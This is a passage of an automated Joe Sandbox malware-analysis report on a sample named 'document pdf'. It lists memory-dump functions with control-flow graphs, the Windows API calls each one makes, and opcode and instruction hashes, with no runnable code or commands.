                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58290e50b247383394368a17c31a767bd2881d35558a85b22837dc884c889d83
                                                                                                                        • Instruction ID: 7008934cf954ba7954fc6a49484f43b89accf8140e5ff96e70d8662af2e18ba7
                                                                                                                        • Opcode Fuzzy Hash: 58290e50b247383394368a17c31a767bd2881d35558a85b22837dc884c889d83
                                                                                                                        • Instruction Fuzzy Hash: 23B14B31A002588FDF55DFA5C884BAEBBB2BF84310F14D16AD849EB295EB309D85CB51
                                                                                                                        Function 0306B7B7 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1266 306b7b7-306b7d7 1267 306b803-306b807 1266->1267 1268 306b7d9-306b7e6 call 306b458 1266->1268 1270 306b81b-306b85c 1267->1270 1271 306b809-306b813 1267->1271 1274 306b7fc 1268->1274 1275 306b7e8 1268->1275 1277 306b85e-306b866 1270->1277 1278 306b869-306b877 1270->1278 1271->1270 1274->1267 1323 306b7ee call 306ba52 1275->1323 1324 306b7ee call 306ba60 1275->1324 1277->1278 1279 306b89b-306b89d 1278->1279 1280 306b879-306b87e 1278->1280 1285 306b8a0-306b8a7 1279->1285 1282 306b880-306b887 call 306b464 1280->1282 1283 306b889 1280->1283 1281 306b7f4-306b7f6 1281->1274 1284 306b938-306b9f8 1281->1284 1287 306b88b-306b899 1282->1287 1283->1287 1316 306ba00-306ba2b GetModuleHandleW 1284->1316 1317 306b9fa-306b9fd 1284->1317 1288 306b8b4-306b8bb 1285->1288 1289 306b8a9-306b8b1 1285->1289 1287->1285 1292 306b8bd-306b8c5 1288->1292 1293 306b8c8-306b8d1 call 306b474 1288->1293 1289->1288 1292->1293 1297 306b8d3-306b8db 1293->1297 1298 306b8de-306b8e3 1293->1298 1297->1298 1299 306b8e5-306b8ec 1298->1299 1300 306b901-306b905 1298->1300 1299->1300 1302 306b8ee-306b8fe call 306b484 call 306b494 1299->1302 1321 306b908 call 306bd60 1300->1321 1322 306b908 call 306bd31 1300->1322 1302->1300 1305 306b90b-306b90e 1307 306b910-306b92e 1305->1307 1308 306b931-306b937 1305->1308 1307->1308 1318 306ba34-306ba48 1316->1318 1319 306ba2d-306ba33 1316->1319 1317->1316 1319->1318 1321->1305 1322->1305 1323->1281 1324->1281
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0306BA1E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 32baa768e7bc51752c6a3909781a1698a6ef3ad0667ee528f91c9a7a4c86de3b
                                                                                                                        • Instruction ID: d75cb0eff16f78200eda9acac9695fac57599f6f26e6b6d77b4d6c2a59fb0e68
                                                                                                                        • Opcode Fuzzy Hash: 32baa768e7bc51752c6a3909781a1698a6ef3ad0667ee528f91c9a7a4c86de3b
                                                                                                                        • Instruction Fuzzy Hash: FB8186B0A01B058FDB64DF2AD54479ABBF1FF88304F048A2ED48AD7A54DB74E845CB90
                                                                                                                        Function 057122B0 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1325 57122b0-57122ba 1326 57122be-57122d0 1325->1326 1326->1326 1327 57122d2-57122df 1326->1327 1328 57122e0-5712310 call 5711740 1327->1328 1330 5712315-5712316 1328->1330
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 11aac8d6ba6748acbd58192243110712fafb0feb0e3e4c83ac02149265e389a6
                                                                                                                        • Instruction ID: c6c29d355ba534919aabe920ab49385f8b80b67160f291e8f65b7e063f644549
                                                                                                                        • Opcode Fuzzy Hash: 11aac8d6ba6748acbd58192243110712fafb0feb0e3e4c83ac02149265e389a6
                                                                                                                        • Instruction Fuzzy Hash: AC6122B2C04349AFDF01CF9AD984ADDBFB6BF48304F15816AE908AB261D7719945CF90
                                                                                                                        Function 05711740 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1331 5711740-5712396 1333 57123a1-57123a8 1331->1333 1334 5712398-571239e 1331->1334 1335 57123b3-5712452 CreateWindowExW 1333->1335 1336 57123aa-57123b0 1333->1336 1334->1333 1338 5712454-571245a 1335->1338 1339 571245b-5712493 1335->1339 1336->1335 1338->1339 1343 57124a0 1339->1343 1344 5712495-5712498 1339->1344 1345 57124a1 1343->1345 1344->1343 1345->1345
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05712442
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: fdd0eae00626131de5b5bee86ea78dfc08e24638f75e59f004953c04229c95da
                                                                                                                        • Instruction ID: 59cc5b7bc3f2939d5825ce9998b2db6ac671e4f25bc869a568d122af3ed58cc8
                                                                                                                        • Opcode Fuzzy Hash: fdd0eae00626131de5b5bee86ea78dfc08e24638f75e59f004953c04229c95da
                                                                                                                        • Instruction Fuzzy Hash: 9D51DEB5D103499FDB14CF9AC884ADEBBB6BF48310F24812AE819AB211D771A845CF94
                                                                                                                        Function 05711894 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1363 5711894-571493c 1366 5714942-5714947 1363->1366 1367 57149ec-5714a0c call 571176c 1363->1367 1368 5714949-5714980 1366->1368 1369 571499a-57149d2 CallWindowProcW 1366->1369 1374 5714a0f-5714a1c 1367->1374 1376 5714982-5714988 1368->1376 1377 5714989-5714998 1368->1377 1372 57149d4-57149da 1369->1372 1373 57149db-57149ea 1369->1373 1372->1373 1373->1374 1376->1377 1377->1374
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 057149C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714655100-0
                                                                                                                        • Opcode ID: 8b10cd44f42628684ff9c2e36d5f7aa1184b075fe83b6e4de19bb2491d6c1f88
                                                                                                                        • Instruction ID: ec75c3001d56e9108da9308f9fb0f51750cfaf2d83c19fb421432387dadfad0a
                                                                                                                        • Opcode Fuzzy Hash: 8b10cd44f42628684ff9c2e36d5f7aa1184b075fe83b6e4de19bb2491d6c1f88
                                                                                                                        • Instruction Fuzzy Hash: 38412CB5900349CFDB14CF99C448AAAFBFAFF88314F248459D919A7321D774A841CFA4
                                                                                                                        Function 030658EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1346 30658ec-30658f3 1347 30658f8-30659b9 CreateActCtxA 1346->1347 1349 30659c2-3065a1c 1347->1349 1350 30659bb-30659c1 1347->1350 1357 3065a1e-3065a21 1349->1357 1358 3065a2b-3065a2f 1349->1358 1350->1349 1357->1358 1359 3065a40 1358->1359 1360 3065a31-3065a3d 1358->1360 1361 3065a41 1359->1361 1360->1359 1361->1361
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030659A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: 677bba5693f1f3654af9d050225f66ddd9a1336a48c00fd8b08df6066e746f5c
                                                                                                                        • Instruction ID: b089c612713f320e1400b3022b6724639157f0379e84b54064135e6fb203c9d1
                                                                                                                        • Opcode Fuzzy Hash: 677bba5693f1f3654af9d050225f66ddd9a1336a48c00fd8b08df6066e746f5c
                                                                                                                        • Instruction Fuzzy Hash: 0B41DFB0C0071DCBDB24CFA9C984B8EBBF6BF89304F20816AD408AB255DB756945CF90
                                                                                                                        Function 030644C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1380 30644c4-30659b9 CreateActCtxA 1383 30659c2-3065a1c 1380->1383 1384 30659bb-30659c1 1380->1384 1391 3065a1e-3065a21 1383->1391 1392 3065a2b-3065a2f 1383->1392 1384->1383 1391->1392 1393 3065a40 1392->1393 1394 3065a31-3065a3d 1392->1394 1395 3065a41 1393->1395 1394->1393 1395->1395
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 030659A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: dff652b7b92ada9f7115a98df5f4ba00403c7cd14753d8d1b3d19c06d055fbae
                                                                                                                        • Instruction ID: c5520f5dc31419977e7e941d7661b454658701a4838f5054f7f44dfa371acd9c
                                                                                                                        • Opcode Fuzzy Hash: dff652b7b92ada9f7115a98df5f4ba00403c7cd14753d8d1b3d19c06d055fbae
                                                                                                                        • Instruction Fuzzy Hash: A641C170C0071DCBDB24DFA9C984B9EBBF6BF49704F20816AD408AB255DB756945CF90
                                                                                                                        Function 0580BDD0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1397 580bdd0-580bdf5 call 5809a0c 1401 580bdf7-580be07 call 580b890 1397->1401 1402 580be0a-580be1a 1397->1402 1406 580be21-580be9c CreateIconFromResourceEx 1402->1406 1407 580be1c-580be1e 1402->1407 1408 580bea5-580bec2 1406->1408 1409 580be9e-580bea4 1406->1409 1407->1406 1409->1408
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromIconResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3668623891-0
                                                                                                                        • Opcode ID: 00915bdf469aba5c618eccd3b60c600e80a8303d02a15aa664c82aa3ae829d49
                                                                                                                        • Instruction ID: b6d58cb8d167069539f1d9ae47d4946e1048223a1026a84c7bc85db5e5505c26
                                                                                                                        • Opcode Fuzzy Hash: 00915bdf469aba5c618eccd3b60c600e80a8303d02a15aa664c82aa3ae829d49
                                                                                                                        • Instruction Fuzzy Hash: 9D317A729043599FCB11CFA9C844ADEBFF8EF49320F14805AEA54E7261C3359854DFA1
                                                                                                                        Function 0306D818 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1412 306d818-306dd3c DuplicateHandle 1414 306dd45-306dd62 1412->1414 1415 306dd3e-306dd44 1412->1415 1415->1414
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0306DC6E,?,?,?,?,?), ref: 0306DD2F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 77739c875fcffa64a7c3aa18ff755c0d4bd140a2f29c28d018fa2b8a32135611
                                                                                                                        • Instruction ID: 790d2ce98ecd886bc83c9249e3acb1e40e9836ddb25046373ae8b6d68892e934
                                                                                                                        • Opcode Fuzzy Hash: 77739c875fcffa64a7c3aa18ff755c0d4bd140a2f29c28d018fa2b8a32135611
                                                                                                                        • Instruction Fuzzy Hash: CD2103B5900249DFDB10CF9AD984AEEBBF8EB48320F14841AE918A3311D374A954CFA5
                                                                                                                        Function 05809A0C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1418 5809a0c-580be9c CreateIconFromResourceEx 1421 580bea5-580bec2 1418->1421 1422 580be9e-580bea4 1418->1422 1422->1421
                                                                                                                        APIs
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0580BDEA,?,?,?,?,?), ref: 0580BE8F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromIconResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3668623891-0
                                                                                                                        • Opcode ID: 1e69096e566b59cbe11a01152a22b4708f6b35898803c1dc19d5a71805e0a071
                                                                                                                        • Instruction ID: 2ab4440a11d1ae16cd1daa2ff44b390d7d2305b896fee1d8358f767ef98c1f1c
                                                                                                                        • Opcode Fuzzy Hash: 1e69096e566b59cbe11a01152a22b4708f6b35898803c1dc19d5a71805e0a071
                                                                                                                        • Instruction Fuzzy Hash: D61126B580024D9FDB10CF9AD844BEEBFF9EB48324F14841AEA54A7250C375A954CFA5
                                                                                                                        Function 0306B9B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1425 306b9b8-306b9f8 1426 306ba00-306ba2b GetModuleHandleW 1425->1426 1427 306b9fa-306b9fd 1425->1427 1428 306ba34-306ba48 1426->1428 1429 306ba2d-306ba33 1426->1429 1427->1426 1429->1428
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0306BA1E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 1ecdfb7ef182b0ecb5fdc98329eb1f2f4a2bcf6461d5064cc1e912e5433d37c7
                                                                                                                        • Instruction ID: 21998ef7ef790dff8810ce4ed59abcb3601d82603afa95cf1fa4e40483e517b3
                                                                                                                        • Opcode Fuzzy Hash: 1ecdfb7ef182b0ecb5fdc98329eb1f2f4a2bcf6461d5064cc1e912e5433d37c7
                                                                                                                        • Instruction Fuzzy Hash: E71110B6C003498FCB20CF9AD844BDEFBF4AF88224F14841AD819A7200C379A545CFA1
                                                                                                                        Function 0175D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89f44fb4946bb2ac7609be9608a4f8c31382d655336fa23be496df4f613aa58b
                                                                                                                        • Instruction ID: 25ff2fd78ac94f7293669b9880bdaf502a376cddfb935bdd9e4fc0dfa60493e2
                                                                                                                        • Opcode Fuzzy Hash: 89f44fb4946bb2ac7609be9608a4f8c31382d655336fa23be496df4f613aa58b
                                                                                                                        • Instruction Fuzzy Hash: 662148B2100244DFDB25DF84D9C0B66FF65FB84324F20C1ACDD090B256C3B6E456CAA1
                                                                                                                        Function 0175D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e6bbe357af27f724f2af032bf80799aafaaafcc22e172d265085c0aff9a7dd2
                                                                                                                        • Instruction ID: a30e63f5efaf7d59b9baea542bf5bc962d945f63976b470ea14c0a412f4c1494
                                                                                                                        • Opcode Fuzzy Hash: 1e6bbe357af27f724f2af032bf80799aafaaafcc22e172d265085c0aff9a7dd2
                                                                                                                        • Instruction Fuzzy Hash: 5C2133B2500240EFDB65DF94D9C0B26FF61FB88318F30C1A9ED090B256C3B6D456CAA1
                                                                                                                        Function 0176D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a2db8afa69b80c77bbce0352f7b031a159ee69f38eb62b8c055aa4aa9af1c74
                                                                                                                        • Instruction ID: 08371468709eadc6c8b9a3b2fb48589a901a79b4d57976b92e618d3203eec5c2
                                                                                                                        • Opcode Fuzzy Hash: 3a2db8afa69b80c77bbce0352f7b031a159ee69f38eb62b8c055aa4aa9af1c74
                                                                                                                        • Instruction Fuzzy Hash: 0B2149B1618300EFDB25DF94D5C0B25FB69FB88324F24C5ADDD894B252C376D446CA61
                                                                                                                        Function 0176D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 77ceb8f56de64780cce96c726ba7ae2ccac25cc1fbf275b8afe0e93302b48a97
                                                                                                                        • Instruction ID: 5e79f58f72814afa486d58b51a939e5b98d590c90420ac6ec381b31d3865ad45
                                                                                                                        • Opcode Fuzzy Hash: 77ceb8f56de64780cce96c726ba7ae2ccac25cc1fbf275b8afe0e93302b48a97
                                                                                                                        • Instruction Fuzzy Hash: 00213075204200EFCB24DF54D9C0B26FB69EB88314F20C5ADED8A0B252C37AC806CAA1
                                                                                                                        Function 0175D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: 8bb93990c2b4068f6d82434a8557cdabb3eb586997339e098c08e9ec9b7d3e3c
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 0211CD76404280CFCB12CF54D5C0B16BF62FB84218F3486A9DC090B256C33AD45ACBA1
                                                                                                                        Function 0175D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction ID: d39b9226bc732028c6e79a329857fca6e226d8f17990a1dfcdb22e14cbb86f7a
                                                                                                                        • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                        • Instruction Fuzzy Hash: 5411CDB6404280CFDB16CF44D5C0B56BF62FB84224F24C2A9DC090A256C37AE456CBA1
                                                                                                                        Function 0176D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: b4b27167bccded74aeee1a172591cc0eddcc63bfd032425d5fc537f1212253cd
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: AC11BE75604284CFCB12CF54D5C4B15FB61FB88314F24C6A9DC494B656C33AD40ACB61
                                                                                                                        Function 0176D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272363985.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_176d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: 7a6f7c80d7264ef3a58393fb69a55cb5e09eeafcd6a630936958758638abeb49
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: 5D11BE75608280DFCB12CF54C5C0B15FB61FB84224F28C6A9DC494B656C33AD44ACB51

                                                                                                                        Non-executed Functions

                                                                                                                        Function 05710690 Relevance: .3, Instructions: 315COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae56e4fce5512cbb4fba160850534010cd425912b8adedc19d2e39bc5d1d305c
                                                                                                                        • Instruction ID: c1b3fada21465b5452db9d12c2cf98ed92f1dd056654fe5d5b63ecaa3f1522ce
                                                                                                                        • Opcode Fuzzy Hash: ae56e4fce5512cbb4fba160850534010cd425912b8adedc19d2e39bc5d1d305c
                                                                                                                        • Instruction Fuzzy Hash: 311275F04037458EE726EF66ED4C1893BB1B746318F90420AD2656F2E9DBBC154ACF84
                                                                                                                        Function 05802361 Relevance: .3, Instructions: 266COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b494ac1522e5acebc38fd00c610fd4c58a9ebfdbc48b0463028c504f2701300
                                                                                                                        • Instruction ID: 47cbfecbecda556c785be24cf5be789e36aa3e7cc2dabb55ac45db56596f795a
                                                                                                                        • Opcode Fuzzy Hash: 3b494ac1522e5acebc38fd00c610fd4c58a9ebfdbc48b0463028c504f2701300
                                                                                                                        • Instruction Fuzzy Hash: CFD1C33182075BCACB11EB65D994A99F771FFA5300F20C79AE50A77210EFB06AC5CB91
                                                                                                                        Function 05802368 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d383a24d57842abebbe0fafeffddcd98743c3ff53a0846debad27e8d43398d
                                                                                                                        • Instruction ID: 76cfce01726786ea0ab91a71294cf5be00b0d47bed5163981e1af14e08d6a583
                                                                                                                        • Opcode Fuzzy Hash: a3d383a24d57842abebbe0fafeffddcd98743c3ff53a0846debad27e8d43398d
                                                                                                                        • Instruction Fuzzy Hash: 91D1C33182075BCACB11EB65D994A99F771FFA5300F20C79AE50A77210EFB06AC5CB91
                                                                                                                        Function 0306E5A4 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
